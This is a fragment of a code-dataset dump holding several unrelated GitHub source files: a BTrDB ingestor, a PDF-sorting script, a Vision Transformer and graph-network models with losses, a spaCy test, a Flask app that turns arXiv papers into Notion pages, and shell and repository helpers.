DataIngestor\n##########################################################################\n\nclass DataIngestor(object):\n \"\"\"\n Parameters\n ----------\n conn: btrdb.Connection\n merge_policy: str\n merge policy to use when inserting BTrDB points\n total_points: int\n specifies total number of points to be inserted. Used to create a progess bar.\n \"\"\"\n def __init__(self, conn, merge_policy=\"never\", total_points=None):\n self.conn = conn\n\n if total_points is None:\n warnings.warn(\"total points not provided. Progress bar will not be displayed\", ProgressBarWarning)\n self.pbar = None\n else:\n self.pbar = tqdm(total=total_points)\n \n if merge_policy in MERGE_POLICIES:\n self.merge_policy = merge_policy\n else:\n raise Exception(f\"'{merge_policy}' is not a valid merge policy. Options are: {', '.join(MERGE_POLICIES)}\")\n \n @staticmethod\n def _chunk_points(stream, times, values, chunk_size):\n \"\"\"\n Parameters\n ----------\n stream: btrdb Stream\n times: pd.Series of timestamps, which can be datetime, datetime64, float, str (RFC 2822)\n values: pd.Series of float values\n chunk_size: int\n specifies number of (time, value) pairs to insert at a time\n \"\"\"\n # drop any null values\n null_positions = values[values.isnull()].index.tolist()\n if len(null_positions) > 0:\n warnings.warn(\n f\"\"\"{len(null_positions)} null values were detected in source data\n and will not be inserted into BTrDB stream {str(stream.uuid)}.\"\"\", NullValuesWarning\n )\n values.drop(null_positions, inplace=True)\n times.drop(null_positions, inplace=True)\n\n points = [(to_nanoseconds(t), v) for t, v in zip(times, values)]\n for i in range(0, len(points), chunk_size):\n yield points[i:i + chunk_size]\n \n # NOTE: I moved this into a separate func to make it easier to test\n def _ingest(self, stream, points):\n \"\"\"\n Parameters\n ----------\n stream: btrdb Stream\n points: list of (time, value) tuples\n \"\"\"\n stream.insert(points, self.merge_policy)\n \n # NOTE: Ideally this function would listen to a queue and would pick up StreamData\n # objects from the DataParser and insert as they are produced\n def ingest(self, streamdata, chunk_size=None):\n \"\"\"\n Parameters\n ----------\n streamdata: StreamData\n chunk_size: int\n specifies number of (time, value) pairs to insert at a time\n \"\"\"\n if not isinstance(streamdata, StreamData):\n raise TypeError(f\"StreamData object expected. Received {type(streamdata)}\")\n\n # check if stream exists already, create it if it doesn't\n meta = streamdata.metadata\n streams = self.conn.streams_in_collection(meta.collection, is_collection_prefix=False, tags=meta.tags)\n\n if len(streams) == 0:\n stream = self.conn.create(uuid.uuid4(), meta.collection, meta.tags, meta.annotations)\n else:\n stream = streams[0]\n \n # convert time and value arrays into list of tuples and split into chunks for insertion\n chunk_size = chunk_size or INSERT_CHUNK_SIZE\n for points in self._chunk_points(stream, streamdata.times, streamdata.values, chunk_size):\n self._ingest(stream, points)\n if self.pbar:\n self.pbar.update(len(points))","repo_name":"PingThingsIO/pgimport","sub_path":"pgimport/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18337650685","text":"import os\nimport shutil\nfrom unidecode import unidecode as semAcento\n\n\ndef check_dir_fonte(d = None):\n\tif not d:\n\t\tprint('Nenhum caminho digitado.')\n\t\texit()\n\t\t#os.chdir('.')\n\telse:\n\t\ttry:\n\t\t\tos.chdir(d)\n\t\texcept:\n\t\t\tprint('Caminho especificado nao encontrado.')\t\n\t\t\n\t\t\ndef list_dir(src):\n\tvar = os.listdir(src)\n\t#print('\\n'.join(var))\n\t\n\tlista = []\n\t#print(f'Conteudo deste diretório:::: ***{os.getcwd()}***\\n\\n\\nLISTAGEM:\\n\\n')\n\t\n\ti = 0\n\tfor arquivo in var:\n\t\tif arquivo.endswith('.pdf'):\n\t\t\tif i < 10:\n\t\t\t\tprint(f'-0{i} {arquivo}')\n\t\t\t\ti+=1\n\t\t\t\tlista.append(arquivo)\n\t\t\telse:\n\t\t\t\tprint(f'-{i} {arquivo}')\n\t\t\t\ti+=1\n\t\t\t\tlista.append(arquivo)\n\t\t\t\t\t\n\t\t\t\n\t\telse:\n\t\t\tif i < 10:\n\t\t\t\tprint(f'-0{i} {arquivo.upper()}' + '(DIR)'.rjust(50 - len(arquivo)) )\n\t\t\t\ti+=1\n\t\t\telse:\n\t\t\t\tprint(f'-{i} {arquivo.upper()}' + '(DIR)'.rjust(50 - len(arquivo)) )\n\t\t\t\ti+=1\t\n\tprint(f\"\\n**Total de arquivos pdf's : {i-1} arquivos\")\n\treturn lista\n\ndef pasta2_pasta_by_termo(pasta_origem = None , pasta_destino = None , termo = None):\n\t\n\t\t\n\tcheck_dir_fonte(pasta_origem)\n\tlista_pdf = list_dir()\n\t\n\tif not os.path.exists(pasta_destino):\n\t\tos.mkdir(pasta_destino)\n\tfor root , dirs , files in os.walk('.'):\n\t\n\t\tif os.getcwd() == pasta_origem:\n\t\t\t\t\t\n\t\t\tfor file in files:\n\t\t\t\tif file.endswith('.pdf'):\n\t\t\t\t\tif termo in semAcento(file).lower():\n\t\t\t\t\t\t\n\t\t\t\t\t\torigem = os.path.join(root,file)\n\t\t\t\t\t\tdestino = os.path.join(f'{pasta_destino}',file)\n\t\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t\t\n\t\t\t\t\t\tshutil.move(origem , destino)\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\tprint('Done !')\t\t\n\t\t\t\n\t\t\n\t\t\n\t\n\t\n\t\n\t\t\n\n\n\t\t\n\nsrc = input('Check Pasta Origem: ')\nwhile True:\n\ttry:\n\t\tlist_dir(src)\t\n\t\tdest = input('Check Pasta Destino: ')\n\t\tterm = input('Check Termo: ')\n\t\tpasta2_pasta_by_termo(src,dest, semAcento(term).lower())\n\texcept:\n\t\tprint('Caminho nao encontrado.')\n\t\tbreak\n","repo_name":"maraes/Microtools","sub_path":"Puts Past v2.py","file_name":"Puts Past v2.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71063254567","text":"from functools import partial\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nfrom model.base_network import BaseNetwork\nimport config as cfg\nfrom model.onepic_cnn_pool import SoftPoolingGcnEncoder\nimport os\n\nimport time\n\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False):\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_() # binarize\n output = x.div(keep_prob) * random_tensor\n return output\n\n\nclass DropPath(nn.Module):\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\n\nclass PatchEmbed(nn.Module):\n\n def __init__(self, img_size=224, patch_size=16, in_c=3, embed_dim=768, norm_layer=None):\n super().__init__()\n img_size = (img_size, img_size)\n patch_size = (patch_size, patch_size)\n self.img_size = img_size\n self.patch_size = patch_size\n self.grid_size = (img_size[0] // patch_size[0], img_size[1] // patch_size[1])\n self.num_patches = self.grid_size[0] * self.grid_size[1]\n\n self.proj = nn.Conv2d(in_c, embed_dim, kernel_size=patch_size, stride=patch_size)\n self.norm = norm_layer(embed_dim) if norm_layer else nn.Identity()\n\n def forward(self, x):\n B, C, H, W = x.shape\n assert H == self.img_size[0] and W == self.img_size[1], \\\n f\"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]}).\"\n x = self.proj(x).flatten(2).transpose(1, 2)\n x = self.norm(x)\n return x\n\n\nclass Attention(nn.Module):\n def __init__(self,\n dim, # 输入token的dim\n num_heads=8,\n qkv_bias=False,\n qk_scale=None,\n attn_drop_ratio=0.,\n proj_drop_ratio=0.):\n super(Attention, self).__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop_ratio)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop_ratio)\n\n def forward(self, x):\n B, N, C = x.shape\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv[0], qkv[1], qkv[2]\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass Mlp(nn.Module):\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass Block(nn.Module):\n def __init__(self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=False,\n qk_scale=None,\n drop_ratio=0.,\n attn_drop_ratio=0.,\n drop_path_ratio=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm):\n super(Block, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop_ratio=attn_drop_ratio, proj_drop_ratio=drop_ratio)\n # NOTE: drop path for stochastic depth, we shall see if this is better than dropout here\n self.drop_path = DropPath(drop_path_ratio) if drop_path_ratio > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop_ratio)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass VisionTransformer(BaseNetwork):\n def __init__(self, img_size=224, patch_size=16, in_c=3, num_classes=1000,\n embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=True,\n qk_scale=None, representation_size=None, distilled=False, drop_ratio=0.,\n attn_drop_ratio=0., drop_path_ratio=0., embed_layer=PatchEmbed, norm_layer=None,\n act_layer=None):\n\n super(VisionTransformer, self).__init__()\n self.num_classes = num_classes\n self.num_features = self.embed_dim = embed_dim # num_features for consistency with other models\n self.num_tokens = 1 # 2 if distilled else 1\n norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n act_layer = act_layer or nn.GELU\n self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n self.patch_embed = embed_layer(img_size=img_size, patch_size=patch_size, in_c=in_c, embed_dim=embed_dim)\n num_patches = self.patch_embed.num_patches\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + self.num_tokens, embed_dim))\n self.pos_drop = nn.Dropout(p=drop_ratio)\n\n dpr = [x.item() for x in torch.linspace(0, drop_path_ratio, depth)] # stochastic depth decay rule\n self.blocks = nn.Sequential(*[\n Block(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop_ratio=drop_ratio, attn_drop_ratio=attn_drop_ratio, drop_path_ratio=dpr[i],\n norm_layer=norm_layer, act_layer=act_layer)\n for i in range(depth)\n ])\n self.norm = norm_layer(embed_dim)\n\n # Representation layer\n if representation_size and not distilled:\n self.has_logits = True\n self.num_features = representation_size\n self.pre_logits = nn.Sequential(OrderedDict([\n (\"fc\", nn.Linear(embed_dim, representation_size)),\n (\"act\", nn.Tanh())\n ]))\n else:\n self.has_logits = False\n self.pre_logits = nn.Identity()\n\n # Classifier head(s)\n self.head_dist = None\n if distilled:\n self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()\n\n def forward_features(self, x):\n x = self.patch_embed(x) # [B, 196, 768]\n cls_token = self.cls_token.expand(x.shape[0], -1, -1)\n x = torch.cat((cls_token, x), dim=1) # [B, 197, 768]\n x = self.pos_drop(x + self.pos_embed)\n x = self.blocks(x)\n x = self.norm(x)\n return x\n\n def forward(self, x):\n x = self.forward_features(x)\n return x\n\n\ndef vit_base_patch16_224():\n \"\"\"\n 链接: https://pan.baidu.com/s/1zqb08naP0RPqqfSXfkB2EA 密码: eu9f\n \"\"\"\n model = VisionTransformer(img_size=224,\n patch_size=16,\n embed_dim=768,\n depth=12,\n num_heads=12,\n representation_size=None,\n num_classes=0)\n return model\n\n\ndef vit_path_id(node_list, w, h):\n patch = 16\n img_id_array_list = []\n for node in node_list:\n id_list = []\n x1 = node[0]\n y1 = node[1]\n x2 = node[2]\n y2 = node[3]\n new_x1 = int((x1 / w) * 224)\n new_x2 = int((x2 / w) * 224)\n new_y1 = int((y1 / h) * 224)\n new_y2 = int((y2 / h) * 224)\n x1_id = new_x1 // patch\n y1_id = new_y1 // patch\n x2_id = new_x2 // patch\n y2_id = new_y2 // patch\n for x in range(x1_id, x2_id + 1):\n for y in range(y1_id, y2_id + 1):\n node_id = (224 / patch) * y + x\n id_list.append(node_id)\n img_id_array_list.append(id_list)\n return img_id_array_list\n\n\nclass apnb_vit_pool(BaseNetwork):\n def __init__(self):\n super(apnb_vit_pool, self).__init__()\n self.vit = vit_base_patch16_224()\n self.GCN = SoftPoolingGcnEncoder(input_dim=768, hidden_dim=512, embedding_dim=512,\n assign_hidden_dim=512, class_num=cfg.class_num)\n self.vit.init_weights()\n self.GCN.init_weights()\n self.vit_load_weights()\n\n def vit_load_weights(self):\n device = torch.device(\"cpu\")\n self.vit.load_state_dict(torch.load(os.path.join('checkpoints/finetun/vit.pth'), map_location=device),\n strict=False)\n print(\"checkpoints/finetun/vit.pth记载完成\")\n\n def get_batch_node_feature(self, B, size, boxes, vit_features):\n # 全部batch的节点特征\n all_batch_node_feature_list = []\n for b in range(B):\n h, w = size[b]\n node_list = boxes[b]\n path_id_list = vit_path_id(node_list, w, h)\n # 当前节点的特征\n now_batch_node_feature_list = []\n for patch in path_id_list[:-1]:\n # 一个节点的特征\n one_node_feature_list = []\n for id in patch:\n id = int(id)\n # 一个patch的特征\n tmp_feature = vit_features[b:b + 1, id + 1:id + 2, :]\n one_node_feature_list.append(tmp_feature)\n one_node_feature = torch.cat(one_node_feature_list, dim=1)\n # 求均值\n one_node_feature = torch.mean(one_node_feature, dim=1).unsqueeze(1)\n # 保存到当前batch中\n now_batch_node_feature_list.append(one_node_feature)\n # 全图特征\n now_batch_node_feature_list.append(torch.mean(vit_features[b:b + 1, :, :], dim=1).unsqueeze(1))\n # 得到当前batch的节点特征\n now_batch_node_feature = torch.cat(now_batch_node_feature_list, dim=1)\n # 保存到所有batch中\n all_batch_node_feature_list.append(now_batch_node_feature)\n all_batch_node_feature = torch.cat(all_batch_node_feature_list, dim=0)\n return all_batch_node_feature\n\n def forward(self, images, size, boxes, adj):\n vit_features = self.vit(images)\n batch_node_features = self.get_batch_node_feature(images.shape[0], size, boxes, vit_features)\n out_dict = self.GCN(batch_node_features, adj)\n return out_dict\n","repo_name":"Larry-zx/Artistic-analysis","sub_path":"model/apnb_vit_pool.py","file_name":"apnb_vit_pool.py","file_ext":"py","file_size_in_byte":11145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72197224169","text":"from beam_pipeline import SpacySentenceSpan, SpacySpan, SpacyToken\nimport pytest\n\n\n@pytest.fixture\ndef nlp(scope='module'):\n import spacy\n from benepar.spacy_plugin import BeneparComponent\n nlp = spacy.load('en_core_web_sm')\n nlp.add_pipe(BeneparComponent('benepar_en'))\n return nlp\n\n\ndef test_parse(nlp):\n doc = nlp(u'The cat sat on the mat by a hat.')\n sent = next(doc.sents)\n psent = SpacySentenceSpan(sent)\n for child in psent._.children:\n assert isinstance(child, SpacySpan)\n s = [(sent, psent)]\n while s:\n span, pspan = s.pop()\n print('<', span.text)\n print('>', pspan.text)\n assert isinstance(pspan, SpacySpan)\n assert len(span) == len(pspan)\n assert span.text_with_ws == pspan.text_with_ws\n assert span.text == pspan.text\n if len(span) == 1:\n assert isinstance(pspan[0], SpacyToken)\n assert span[0].lemma_ == pspan[0].lemma_\n assert span[0].dep_ == pspan[0].dep_\n assert span[0].whitespace_ == pspan[0].whitespace_\n s.extend(reversed(list(zip(span._.children, pspan._.children))))\n","repo_name":"expz/past2present","sub_path":"dataflow/test/test_beam_pipeline.py","file_name":"test_beam_pipeline.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21647706343","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nimport numpy as np\n\nfrom layers import *\n\n\nclass GAT(nn.Module):\n def __init__(self, n_units, n_heads, dropout, attn_dropout, instance_normalization, diag):\n super(GAT, self).__init__()\n self.num_layer = len(n_units) - 1\n self.dropout = dropout\n self.inst_norm = instance_normalization\n if self.inst_norm:\n self.norm = nn.InstanceNorm1d(n_units[0], momentum=0.0, affine=True)\n self.layer_stack = nn.ModuleList()\n self.diag = diag\n for i in range(self.num_layer):\n f_in = n_units[i] * n_heads[i - 1] if i else n_units[i]\n self.layer_stack.append(MultiHeadGraphAttention(n_heads[i], f_in, n_units[i + 1], attn_dropout, diag, nn.init.ones_, False))\n\n def forward(self, x, adj):\n if self.inst_norm:\n x = self.norm(x)\n for i, gat_layer in enumerate(self.layer_stack):\n if i + 1 < self.num_layer:\n x = F.dropout(x, self.dropout, training=self.training)\n x = gat_layer(x, adj)\n if self.diag:\n x = x.mean(dim=0)\n if i + 1 < self.num_layer:\n if self.diag:\n x = F.elu(x)\n else:\n x = F.elu(x.transpose(0, 1).contiguous().view(adj.size(0), -1))\n if not self.diag:\n x = x.mean(dim=0)\n\n return x\n\n\"\"\" vanilla GCN \"\"\"\n\n\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid, nout, dropout):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, nout)\n self.dropout = dropout\n\n def forward(self, x, adj):\n x = F.relu(self.gc1(x, adj)) # change to leaky relu\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, adj)\n return x\n\n\n\n\"\"\" loss \"\"\"\n\ndef cosine_sim(im, s):\n \"\"\"Cosine similarity between all the image and sentence pairs\n \"\"\"\n return im.mm(s.t())\n\n\ndef l2norm(X):\n \"\"\"L2-normalize columns of X\n \"\"\" \n norm = torch.pow(X, 2).sum(dim=1, keepdim=True).sqrt()\n a = norm.expand_as(X) + 1e-8\n X = torch.div(X, a) \n return X\n\nclass NCA_loss(nn.Module):\n\n def __init__(self, alpha, beta, ep):\n super(NCA_loss, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.ep = ep\n self.sim = cosine_sim\n #from pytorch_metric_learning import losses\n #self.loss_func = losses.MultiSimilarityLoss()\n\n\n def forward(self, emb, train_links, test_links, device=0):\n \n emb = F.normalize(emb)\n num_ent = emb.shape[0]\n\n im = emb[train_links[:, 0]]\n s = emb[train_links[:,1]]\n \n #labels = torch.arange(im.size(0))\n #embeddings = torch.cat([im, s], dim=0)\n #labels = torch.cat([labels, labels], dim=0)\n #loss = self.loss_func(embeddings, labels)\n #return loss\n\n #\"\"\"\n \n if len(test_links) != 0:\n test_links = test_links[random.sample([x for x in np.arange(0,len(test_links))],4500)]\n\n im_neg_scores = self.sim(im, emb[test_links[:,1]])\n s_neg_scores = self.sim(s, emb[test_links[:,0]])\n \n #im = l2norm(im)\n #s = l2norm(s)\n \n bsize = im.size()[0]\n # compute prediction-target score matrix\n #print (im)\n #print(s)\n scores = self.sim(im, s) #+ 1\n #print (scores)\n tmp = torch.eye(bsize).cuda(device)\n s_diag = tmp * scores\n \n alpha = self.alpha\n alpha_2 = alpha # / 3.0\n beta = self.beta\n ep = self.ep\n S_ = torch.exp(alpha * (scores - ep))\n S_ = S_ - S_ * tmp # clear diagnal\n\n if len(test_links) != 0:\n S_1 = torch.exp(alpha * (im_neg_scores - ep))\n S_2 = torch.exp(alpha * (s_neg_scores - ep))\n\n loss_diag = - torch.log(1 + F.relu(s_diag.sum(0)))\n\n loss = torch.sum(\n torch.log(1 + S_.sum(0)) / alpha\n + torch.log(1 + S_.sum(1)) / alpha \n + loss_diag * beta \\\n ) / bsize\n if len(test_links) != 0:\n loss_global_neg = (torch.sum(torch.log(1 + S_1.sum(0)) / alpha_2\n + torch.log(1 + S_2.sum(0)) / alpha_2) \n + torch.sum(torch.log(1 + S_1.sum(1)) / alpha_2\n + torch.log(1 + S_2.sum(1)) / alpha_2)) / 4500 \n if len(test_links) != 0:\n return loss + loss_global_neg\n return loss\n #\"\"\"\n \nclass NCA_loss_cross_modal(nn.Module):\n\n def __init__(self, alpha, beta, ep):\n super(NCA_loss_cross_modal, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.ep = ep\n self.sim = cosine_sim\n\n def forward(self, emb1, emb2, train_links, device=0):\n \n emb1 = F.normalize(emb1)\n emb2 = F.normalize(emb2)\n num_ent = emb1.shape[0]\n\n im = emb1[train_links[:, 0]]\n s = emb2[train_links[:,1]]\n \n \n bsize = im.size()[0]\n # compute prediction-target score matrix\n #print (im)\n #print(s)\n scores = self.sim(im, s) #+ 1\n #print (scores)\n tmp = torch.eye(bsize).cuda(device)\n s_diag = tmp * scores\n \n alpha = self.alpha\n alpha_2 = alpha # / 3.0\n beta = self.beta\n ep = self.ep\n S_ = torch.exp(alpha * (scores - ep))\n S_ = S_ - S_ * tmp # clear diagnal\n\n loss_diag = - torch.log(1 + F.relu(s_diag.sum(0)))\n\n loss = torch.sum(\n torch.log(1 + S_.sum(0)) / alpha\n + torch.log(1 + S_.sum(1)) / alpha \n + loss_diag * beta \\\n ) / bsize\n return loss\n\nclass SelfAttention(nn.Module):\n def __init__(self, hidden_size, batch_first=False):\n super(SelfAttention, self).__init__()\n\n self.hidden_size = hidden_size\n self.batch_first = batch_first\n\n self.att_weights = nn.Parameter(torch.Tensor(1, hidden_size),\n requires_grad=True)\n\n nn.init.xavier_uniform(self.att_weights.data)\n\n def get_mask(self):\n pass\n\n def forward(self, inputs):\n\n if self.batch_first:\n batch_size, max_len = inputs.size()[:2]\n else:\n max_len, batch_size = inputs.size()[:2]\n inputs = inputs.permute(1, 0, 2)\n\n # att = torch.mul(inputs, self.att_weights.expand_as(inputs))\n # att = att.sum(-1)\n weights = torch.bmm(inputs,\n self.att_weights # (1, hidden_size)\n .permute(1, 0) # (hidden_size, 1)\n .unsqueeze(0) # (1, hidden_size, 1)\n # (batch_size, hidden_size, 1)\n .repeat(batch_size, 1, 1)\n )\n\n attentions = F.softmax(F.relu(weights.squeeze()))\n\n # apply weights\n weighted = torch.mul(\n inputs, attentions.unsqueeze(-1).expand_as(inputs))\n\n # get the final fixed vector representations of the sentences\n representations = weighted.sum(1).squeeze()\n\n return representations, attentions\n\n\ndef attention(q, k, v, d_k, mask=None, dropout=None):\n \n scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(d_k)\n \n if mask is not None:\n mask = mask.unsqueeze(1)\n scores = scores.masked_fill(mask == 0, -1e9)\n \n scores = F.softmax(scores, dim=-1)\n \n if dropout is not None:\n scores = dropout(scores)\n \n output = torch.matmul(scores, v)\n return output\n\nclass Norm(nn.Module):\n def __init__(self, d_model, eps = 1e-6):\n super().__init__()\n \n self.size = d_model\n # create two learnable parameters to calibrate normalisation\n self.alpha = nn.Parameter(torch.ones(self.size))\n self.bias = nn.Parameter(torch.zeros(self.size))\n self.eps = eps\n def forward(self, x):\n norm = self.alpha * (x - x.mean(dim=-1, keepdim=True)) \\\n / (x.std(dim=-1, keepdim=True) + self.eps) + self.bias\n return norm\n\nclass FeedForward(nn.Module):\n def __init__(self, d_model, d_ff=2048, dropout = 0.1):\n super().__init__() \n # We set d_ff as a default to 2048\n self.linear_1 = nn.Linear(d_model, d_ff)\n self.dropout = nn.Dropout(dropout)\n self.linear_2 = nn.Linear(d_ff, d_model)\n def forward(self, x):\n x = self.dropout(F.relu(self.linear_1(x)))\n x = self.linear_2(x)\n return x\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, heads, d_model, dropout=0.0):\n super().__init__()\n \n self.d_model = d_model\n self.d_k = d_model // heads\n #print (self.d_k) \n self.h = heads\n \n self.q_linear = nn.Linear(d_model, d_model)\n self.v_linear = nn.Linear(d_model, d_model)\n self.k_linear = nn.Linear(d_model, d_model)\n self.dropout = nn.Dropout(dropout)\n self.out = nn.Linear(d_model, d_model)\n \n def forward(self, q, k, v, mask=None):\n \n bs = q.size(0)\n \n # perform linear operation and split into h heads\n \n #print (k.shape)\n\n k = self.k_linear(k).view(bs, -1, self.h, self.d_k)\n q = self.q_linear(q).view(bs, -1, self.h, self.d_k)\n v = self.v_linear(v).view(bs, -1, self.h, self.d_k)\n \n # transpose to get dimensions bs * h * sl * d_model\n \n k = k.transpose(1,2)\n q = q.transpose(1,2)\n v = v.transpose(1,2)# calculate attention using function we will define next\n #print (k.shape)\n scores = attention(q, k, v, self.d_k, mask, self.dropout)\n \n # concatenate heads and put through final linear layer\n concat = scores.transpose(1,2).contiguous()\\\n .view(bs, -1, self.d_model)\n \n output = concat\n output = self.out(concat)\n \n return output\n","repo_name":"cambridgeltl/eva","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10286,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"31428909492","text":"from flask import Flask, jsonify, request, session, send_from_directory\nfrom flask_cors import CORS\nfrom flask_session import Session\nimport requests\nfrom datetime import timedelta\nimport os\n\nfrom utils.notion import get_access_token, get_database_data, create_page\nfrom utils.arxiv import get_paper_info, download_paper_pdf, download_paper_image\nfrom utils.chatgpt import get_summary\n\napp = Flask(__name__, static_folder='.images')\nCORS(app, supports_credentials=True)\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_USE_SIGNER\"] = True\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\napp.config[\"SECRET_KEY\"] = 'super secret key'\napp.config[\"SESSION_FILE_DIR\"] = \"./.flask_session/\"\napp.config['SESSION_COOKIE_SAMESITE'] = 'None'\napp.config['SESSION_COOKIE_SECURE'] = True\n\nSession(app)\n\n@app.route('/.images/')\ndef send_image(path):\n return send_from_directory('.images', path)\n\n@app.route('/login/', methods=['GET'])\ndef login(code):\n session['access_token'] = get_access_token(code)\n\n response = get_database_data(session['access_token'])\n return jsonify(response.json()), 200\n\n@app.route('/add-page', methods=['POST'])\ndef add_page():\n data = get_paper_info(request.json.get('url'))\n if data == None:\n return jsonify({'error': 'Invalid URL'}), 400\n\n data['url'] = request.json.get('url')\n pdf_path = download_paper_pdf(data['id'])\n img_path = download_paper_image(pdf_path)\n data['summary'] = get_summary(data)\n\n response = create_page(session['access_token'], request.json.get('database_id'), data)\n\n if response.status_code == 200:\n response_data = response.json()\n response_data[\"img_path\"] = f\"http://localhost:5000/{img_path}/image1.png\"\n return jsonify(response_data), 200\n else:\n return jsonify(response.json()), 400\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)\n","repo_name":"tenten0727/paper_to_notion","sub_path":"flask-backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34668925761","text":"import os\nimport subprocess\n\ndef is_exe(fpath):\n \"\"\"Returns True if the given path is executable\"\"\"\n return os.path.exists(fpath) and os.access(fpath, os.X_OK)\n\ndef which(program):\n \"\"\"Mimics the unix command ``which``. Taken from:\n http://stackoverflow.com/a/377028/624900\n \n :param program: A name of a command or an absolute path\n \"\"\"\n\n fpath, fname = os.path.split(program)\n if fpath:\n if is_exe(program):\n return program\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\ndef abspath_join(*args):\n \"\"\"Joins multiple paths together and returns the absolute path\"\"\"\n return os.path.abspath(os.path.join(*args))\n\ndef run_command(command, **kwargs):\n \"\"\"Runs the given command.\"\"\"\n added_env = kwargs.pop('added_env', {})\n if len(added_env) > 0:\n env = kwargs.pop('env', {})\n print(\"Added environment variables for command:\")\n print(\" -- \" + \"\\n -- \".join(\"%s=%s\" % (k,v) for k,v in (env.items() + added_env.items())))\n env = dict(env.items() + added_env.items() + os.environ.items())\n kwargs['env'] = env\n print(\"Running command:\\n === \" + \" \".join(command))\n return subprocess.call(command, **kwargs)\n\ndef hg_clone(url, dest, tag=None):\n \"\"\"Clones a mercurial repository\n \n :param url: URL of the repo\n :param dest: Destination directory on disk\n :param tag: Mercurial tag to check out (optional)\n \"\"\"\n command = [\"hg\", \"clone\", url]\n if tag is not None:\n command.append(\"-u\")\n command.append(tag)\n command.append(dest)\n run_command(command)\n\ndef svn_co(url, dest):\n \"\"\"Checks out a Subversion repository\n \n :param url: URL of subversion repo\n \"\"\"\n command = [\"svn\", \"checkout\", url, dest]\n run_command(command)\n\ndef mkdir(path, ensure=True):\n \"\"\"Creates 